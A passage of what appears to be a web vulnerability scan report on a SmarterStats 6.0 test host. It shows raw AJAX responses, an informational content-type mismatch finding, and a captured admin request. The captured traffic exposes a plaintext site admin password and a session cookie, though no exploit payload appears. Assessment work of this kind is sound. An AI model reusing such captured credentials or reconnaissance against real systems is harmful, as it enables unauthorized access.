eXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAAhAT3B0aW9ucwH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAYPAAAACk9wdGlvbnNUYWILZAUZY3RsMDAkTVBIJFBhZ2VJZGVudGlmaWVyMQ8FIDY3MDZiNjFkOGZiODQwOGRiMGJkN2RhZjk5NTZlM2VjZAUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTgPMtoLAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAApAU0VPU3RhdHVzAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAAMU0VPU3RhdHVzVGFiC2QFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW0zDzLgCwABAAAA/////wEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz////kAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr////8////BgcAAAAEVGV4dAoB+P////z///8GCQAAAApSZXNvdXJjZUlEBgoAAAANQExvZ0xvY2F0aW9ucwH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAYPAAAAD0xvZ0xvY2F0aW9uc1RhYgtkC849/B+jKVr+J9Hc9OvUevssoNDIWhUIxlPlVSeJmes=|126|asyncPostBackControlIDs||ctl00$BPH$btnSave,,ctl00$BPH$btnEdit,,ctl00$MPH$btnRefresh,,ctl00$BPH$mnu1,,ctl00$MPH$btnUpdateIISImport,,ctl00$BPH$btnDelete,|0|postBackControlIDs|||95|updatePanelIDs||tctl00$UpdatePanel1,,tctl00$TPH$UpdatePanel1,,tctl00$MPH$UpdatePanel5,,tctl00$MPH$UpdatePanel3,|22|childUpdatePanelIDs||ctl00$MPH$UpdatePanel3|67|panelsToRefreshIDs||ctl00$UpdatePanel1,,ctl00$TPH$UpdatePanel1,,ctl00$MPH$UpdatePanel5,|2|asyncPostBackTimeout||90|32|formAction||frmSite.aspx?SiteId=1&popup=true|20|pageTitle||Sites - SmarterStats|224|scriptBlock|ScriptPath|/ScriptResource.axd?d=pVn15ziXvQY5aBffxiDTK6PUkVd1wbLwZ8qHXgDTDQU-gDmeOQZCbCnf3LN8cb6wKZJNHgRyjasDbTS9TuTZ7GXz6UL6zabFuTHuGM9izuBi-gzcVhEZX9Fg6cQx4oJc6iXtzA8ahWISPmTnWBlMNk0W7V9Kl_5HxQNbPSm8qmJcO3ou2wT9aun3Nb592DHA0&t=26c081|198|scriptStartupBlock|ScriptContentNoTags|
function ShowContextMenu_ctl00_MPH_ctl02(evt) {
   $('#ctl00_MPH_ctl02').showHyperContextMenu(evt);
   evt.cancelBubble = true;
   if (evt.stopPropagation) evt.stopPropagation();
   return false;
}
|21|scriptStartupBlock|ScriptContentNoTags|DoPopupWindowClose();|51|scriptStartupBlock|ScriptContentNoTags|if (document.ResizeEvent) document.ResizeEvent();
|65|scriptStartupBlock|ScriptContentNoTags|$('#ctl00_MPH_txtAdminNewPassword_SettingText').val('LL12345');
|944|scriptStartupBlock|ScriptContentNoTags|var ctl00_MPH_grdLogLocations_Url6893 = new Array();
ctl00_MPH_grdLogLocations_Url6893[0] = '\x2fAdmin\x2fPopups\x2ffrmLogLocation\x2easpx\x3flguid\x3d987e66443e514990a8afcfb456a232c0\x26UniqueID\x3d6706b61d8fb8408db0bd7daf9956e3ec';
var ctl00_MPH_grdLogLocations;
function DelayedSetupctl00_MPH_grdLogLocations() {
   ctl00_MPH_grdLogLocations = new HyperGrid('ctl00_MPH_grdLogLocations', true, '', 'Url6893', '', null, 0, ShowContextMenu_ctl00_MPH_ctl02, DoubleClick, null, false, 2, '\x7b0\x7d\x20selected\x20items',false, '', {});
   ctl00_MPH_grdLogLocations.AddUrlColumn('Url6893',ctl00_MPH_grdLogLocations_Url6893);
   ctl00_MPH_grdLogLocations.AutoSelect();
   ctl00_MPH_grdLogLocations.Focus();
}
if (self.ctl00_MPH_grdLogLocationsHGIsCallback)
   DelayedSetupctl00_MPH_grdLogLocations();
else
   HGAddLoadEvent(function(){setTimeout(DelayedSetupctl00_MPH_grdLogLocations, 100);});
self.ctl00_MPH_grdLogLocationsHGIsCallback = true;
|328|scriptStartupBlock|ScriptContentNoTags|

























function DelayedSetupctl00_MPH_grdLogStatus() { }
if (self.ctl00_MPH_grdLogStatusHGIsCallback)
   DelayedSetupctl00_MPH_grdLogStatus();
else
   HGAddLoadEvent(function(){setTimeout(DelayedSetupctl00_MPH_grdLogStatus, 100);});
self.ctl00_MPH_grdLogStatusHGIsCallback = true;
|278|scriptStartupBlock|ScriptContentNoTags|
function DelayedSetupctl00_MPH_grdSeoStatus() { }
if (self.ctl00_MPH_grdSeoStatusHGIsCallback)
   DelayedSetupctl00_MPH_grdSeoStatus();
else
   HGAddLoadEvent(function(){setTimeout(DelayedSetupctl00_MPH_grdSeoStatus, 100);});
self.ctl00_MPH_grdSeoStatusHGIsCallback = true;
|648|scriptStartupBlock|ScriptContentNoTags|$(function() { $('#ctl00_TPH_HyperTabStrip1').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_HyperTabStrip1_HyperTabItem1":"ctl00_MPH_OptionsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem2":"ctl00_MPH_LogOptionsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem3":"ctl00_MPH_LogLocationsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem4":"ctl00_MPH_LogFTPTab","ctl00_TPH_HyperTabStrip1_HyperTabItem5":"ctl00_MPH_SeoOptionsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem7":"ctl00_MPH_LogStatusTab","ctl00_TPH_HyperTabStrip1_HyperTabItem8":"ctl00_MPH_SEOStatusTab"},"ClientCallbacks":{"onTabChanged":"TabChanged"}}); });
|83|scriptStartupBlock|ScriptContentNoTags|Sys.Application.add_init(function() {if (self.valSwitchTab) self.valSwitchTab();});|27|scriptStartupBlock|ScriptContentNoTags|modules['isPostBack']=true;|48|scriptStartupBlock|ScriptContentNoTags|modules['vmNotBlank_txt']='Must have a value';
|141|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Site Name","vcID":"ctl00_MPH_txtDomainName_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
|48|scriptStartupBlock|ScriptContentNoTags|modules['vmOptional_txt']='Value is optional';
|140|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Site Url","vcID":"ctl00_MPH_txtDomainUrl_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
|157|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Site Admin Username","vcID":"ctl00_MPH_txtAdminNewUserName_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
|157|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Site Admin Password","vcID":"ctl00_MPH_txtAdminNewPassword_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
|152|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Export Url","vcID":"ctl00_MPH_txtLogFileExportLocURL_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
|171|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Default Documents (one per line)","vcID":"ctl00_MPH_txtDefaultDocuments_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
|573|scriptStartupBlock|ScriptContentNoTags|$(function() { $('#ctl00_MPH_ctl02').hyperMenu({"ClearFloat":false,"IsContextMenu":true,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_MPH_ctl02_hm0":"__doPostBack(\u0027ctl00$BPH$mnu1\u0027,\u0027ctl00_BPH_mnu1_btnAdd\u0027)","ctl00_MPH_ctl02_hm0_hm0":"__doPostBack(\u0027ctl00$BPH$mnu1\u0027,\u0027ctl00_BPH_mnu1_btnAdd_btnAddLogLocation\u0027)","ctl00_MPH_ctl02_hm1":"__doPostBack(\u0027ctl00$BPH$btnEdit\u0027,\u0027\u0027)","ctl00_MPH_ctl02_hm2":"DoDeleteQuery_ctl00_BPH_btnDelete();"},"ClientCallbacks":{}}); });
|45|scriptStartupBlock|ScriptContentNoTags|modules['vmNumber_txt']='Must be a number';
|58|scriptStartupBlock|ScriptContentNoTags|modules['vmNumberGreater_txt']='Must be {0} or greater';
|202|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Max Keywords","vcID":"ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
|208|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Max Competitors","vcID":"ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
|213|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Max Position to Retrieve","vcID":"ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
|

10.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSites.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

POST /Admin/frmSites.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"1647212677","TopBarSection":"AdminManage"}
Content-Length: 912

ctl00%24ScriptManager1=ctl00%24BPH%24UpdatePanel4%7Cctl00%24BPH%24btnRefresh&__EVENTTARGET=ctl00%24BPH%24btnRefresh&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJOTI0MTQ3MzQ1DxYGHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UeBF9zR0ZnFgJmD2QWAgIBD2QWDAIDD2QWAgIDD2QWAgIBD2QWAmYPZBYCAgEPZBYCAgEPDxYCHgRUZXh0BQlTZWFyY2guLi5kZAIEDxYCHgVzdHlsZQUNZGlzcGxheTpub25lO2QCBg8WAh4HVmlzaWJsZWhkAgcPZBYCZg9kFgICAQ8WAh8FaBYCAgEPFgIfA2VkAggPFgIfBWhkAgsPZBYCAgMPZBYCAgEPZBYCZg9kFgICAQ8PFgIfAwUJMSBzaXRlKHMpZGQYAgUXY3RsMDAkTmF2UEgkSHlwZXJQYWdlcjEPBR9jdGwwMF9NUEhfSHlwZXJHcmlkMXwxfDB8OXwyNXwwZAUUY3RsMDAkTVBIJEh5cGVyR3JpZDEPBS1UcnVlfFRydWV8fEZhbHNlfEZhbHNlfG5hbWUgYXNjfEZhbHNlfEZhbHNlfDBkJMUqi4uoEethdHSZm63f3B4wJqE7AWufwFHKgl0cT%2FU%3D&ctl00%24BrPH%24searchBar%24FilterBox=Search...&ctl00%24SPH%24txtSearchString=&ctl00_MPH_HyperGrid1_CB64_MQ--=on&ctl00_MPH_HyperGrid1_HiddenInput=&ctl00_MPH_HyperGrid1_HiddenLSR=0&__ASYNCPOST=true&

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:37:17 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 11024

1|#||4|2392|updatePanel|ctl00_BPH_UpdatePanel4|
           <div id="ctl00_BPH_btnNew" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('frmSite.aspx',800,600);; return false;"><span class="BBInner">New</span></a></div>
           <div id="ctl00_BPH_btnEdit" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_btnEdit(); return false;"><span class="BBInner">Edit</span></a></div>
           <div id="ctl00_BPH_btnDelete" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnDelete',''); return false;"><span class="BBInner">Delete</span></a></div>
           
<!-- HyperMenu -->
<div class='hmMenuBar'><ul class='hmMenu hmMenuBar hmList' id='ctl00_BPH_menuAction' name='ctl00$BPH$menuAction' style='z-index:800'>
   <li class='hmItem hmFirst' id='ctl00_BPH_menuAction_btnViewStats' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>View Site<span class='hmArrow'></span></a>
   <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
       <li class='hmItem hmFirst' id='ctl00_BPH_menuAction_btnViewStats_btnImpersonateAdmin' style='z-index: 800'><a class='hmA' href='#'>As Site Admin</a></li>
       <li class='hmItem hmLast' id='ctl00_BPH_menuAction_btnViewStats_btnImpersonateUser' style='z-index: 800'><a class='hmA' href='#'>As User</a></li>
   </ul><div class='hmScrollDown'></div></div>
   </li>
   <li class='hmItem hmLast' id='ctl00_BPH_menuAction_menuActionRoot' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Actions<span class='hmArrow'></span></a>
   <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
       <li class='hmItem hmFirst' id='ctl00_BPH_menuAction_menuActionRoot_hm0' style='z-index: 800'><a class='hmA' href='#'>Run Diagnostics</a></li>
       <li class='hmItem' id='ctl00_BPH_menuAction_menuActionRoot_hm1' style='z-index: 800'><a class='hmA' href='#'>Reprocess Site</a></li>
       <li class='hmItem hmLast' id='ctl00_BPH_menuAction_menuActionRoot_hm2' style='z-index: 800'><a class='hmA' href='#'>Re-import Site</a></li>
   </ul><div class='hmScrollDown'></div></div>
   </li>
</ul>
</div>

           <div id="ctl00_BPH_btnRefresh" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnRefresh',''); return false;"><span class="BBInner">Refresh</span></a></div>
       |932|updatePanel|ctl00_BrPH_UpdatePanel5|
           
<div id="FilterBarContents" class="RoundedSearchBox">
   <div class="RoundedSearchBoxLeft">
       <div class="RoundedSearchBoxRight">
           <label for="ctl00_BrPH_searchBar_FilterBox" id="ctl00_BrPH_searchBar_FilterBoxLabel" style="display: none">Search...</label>
           <div id="ctl00_BrPH_searchBar_btnGo" class="BBButton GoButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BrPH$searchBar$btnGo',''); return false;"><span class="BBInner"></span></a></div>
           <input name="ctl00$BrPH$searchBar$FilterBox" type="text" value="Search..." id="ctl00_BrPH_searchBar_FilterBox" autocomplete="off" />
           <div id="ctl00_BrPH_searchBar_btnClear" class="BBButton ClearButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BrPH$searchBar$btnClear',''); return false;"><span class="BBInner"></span></a></div>
       </div>
   </div>
</div>


       |11|updatePanel|ctl00_UpdatePanel1|
               
           |2305|updatePanel|ctl00_MPH_UpdatePanel1|
           
<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" class="ac SmallImage" style="overflow: hidden">&nbsp;</th><th scope="col" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=name')">Site Name</a></th><th scope="col" class="ac nw leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=siteid')">Site ID</a></th><th scope="col" class="ac leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=servername')">Server Name</a></th><th scope="col" class="ac leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=currentstate')">Current State</a></th><th scope="col" class="ac leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=currently')">Activity</a></th><th scope="col" class="rc ac leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=status')">Status</a></th></tr>
</thead>
<tbody>
<tr class="firstrow selected"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MQ--" name="ctl00_MPH_HyperGrid1_CB64_MQ--" checked='checked' /></td><td class="ac SmallImage"><img src="/App_Themes/Default/Images/16x16/openstatus.gif" align="absmiddle" /></td><td>vilnerable.smarterstats.6.0.host</td><td class="ac nw leftpad">1</td><td class="ac leftpad">localhost</td><td class="ac leftpad">Running</td><td class="ac leftpad"><span id="spnCurrently1">Loading...</span></td><td class="rc ac leftpad"><span id="spnCurrentState1">Loading...</span></td></tr>
</tbody>
</table>
<input type="hidden" name="ctl00_MPH_HyperGrid1_HiddenInput" id="ctl00_MPH_HyperGrid1_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_HyperGrid1_HiddenLSR" id="ctl00_MPH_HyperGrid1_HiddenLSR" value="" />
</div>
</div>

       |412|updatePanel|ctl00_NavPH_UpdatePanel2|
           
<span class="HyperPagerWrapper" id="ctl00_NavPH_HyperPager1">
<span class="HyperPager">
<span class="hpGroup">First</span>
<span class="hpGroup">&lt;&lt;</span>
<span class="hpGroup">&lt;</span>
<span class="hpPageCurrent">1</span>
<span class="hpPage">of 1</span>
<span class="hpGroup">&gt;</span>
<span class="hpGroup">&gt;&gt;</span>
<span class="hpGroup">Last</span>
</span>
</span>


       |63|updatePanel|ctl00_CntPH_UpdatePanel3|
           <span id="ctl00_CntPH_lblSiteCounter">1 site(s)</span>
